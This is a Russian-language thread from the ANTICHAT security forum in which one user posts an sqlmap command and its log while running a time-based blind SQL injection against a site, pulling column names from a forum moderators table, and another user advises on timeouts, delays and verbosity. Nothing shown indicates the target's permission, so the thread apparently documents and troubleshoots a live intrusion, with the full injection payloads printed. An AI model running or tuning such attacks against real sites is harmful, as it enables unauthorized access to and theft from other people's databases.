ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
08.12.2016, 18:58
|
|
Познающий
Регистрация: 29.03.2012
Сообщений: 77
Провел на форуме:
14367
Репутация:
0
|
|
Сообщение от t0ma5
↑
--time-sec=10 это таймаут, попробуй
--delay=1 это слип в секундах между запросами
а вообще уровень вербозности побольше сделай
-v 4
и посмотри что сервер отвечает
-----------
судя по payload это time-based
как сам думаешь не вешают сервак твои висящие запросы в базе)? надо было как ошибки появились - попробовать зайти на сайт, доступен ли он
Сообщение от None
C:\sql>python sqlmap.py -r 3.txt -D www -T ibf_moderators --columns --time-sec=10 --random-agent --risk=3 --level=1 --delay=1 -v 3
[16:59:47] [INFO] fetching columns for table 'ibf_moderators' in database 'www'
[16:59:47] [INFO] resumed: 27
[16:59:47] [DEBUG] performed 0 queries in 0.00 seconds
[16:59:47] [INFO] resuming partial value: mi
[16:59:47] [PAYLOAD] ' AND (SELECT * FROM (SELECT(SLEEP(10-(IF(ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6962665f6d6f64657261746f7273 AND table_schema=0x777777 LIMIT 0,1),3,1))>64,0,10)))))IowG) AND 'gFNg'='gFNg
[16:59:47] [WARNING] time-based comparison requires larger statistical model, please wait..............................
[17:00:34] [PAYLOAD] ' AND (SELECT * FROM (SELECT(SLEEP(10-(IF(ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6962665f6d6f64657261746f7273 AND table_schema=0x777777 LIMIT 0,1),3,1))>96,0,10)))))IowG) AND 'gFNg'='gFNg
[17:00:34] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[17:00:45] [PAYLOAD] ' AND (SELECT * FROM (SELECT(SLEEP(10-(IF(ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6962665f6d6f64657261746f7273 AND table_schema=0x777777 LIMIT 0,1),3,1))>112,0,10)))))IowG) AND 'gFNg'='gFNg
[17:00:46] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)
[17:00:47] [DEBUG] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request
[17:00:49] [PAYLOAD] ' AND (SELECT * FROM (SELECT(SLEEP(10-(IF(ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6962665f6d6f64657261746f7273 AND table_schema=0x777777 LIMIT 0,1),3,1))>120,0,10)))))IowG) AND 'gFNg'='gFNg
[17:00:50] [PAYLOAD] ' AND (SELECT * FROM (SELECT(SLEEP(10-(IF(ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6962665f6d6f64657261746f7273 AND table_schema=0x777777 LIMIT 0,1),3,1))>116,0,10)))))IowG) AND 'gFNg'='gFNg
[17:00:51] [PAYLOAD] ' AND (SELECT * FROM (SELECT(SLEEP(10-(IF(ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6962665f6d6f64657261746f7273 AND table_schema=0x777777 LIMIT 0,1),3,1))>114,0,10)))))IowG) AND 'gFNg'='gFNg
Вот, тут тупо копирует и тухнет, если поставить -v 4 тогда тупо все время копируется POST и вся инфа которая лежит в 3.txt. + [17:04:32] [TRAFFIC OUT] HTTP request [#]: итд Сайт конечно же работает, врятли sql запросы могут повесить бд или сам сайт.
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Древовидный вид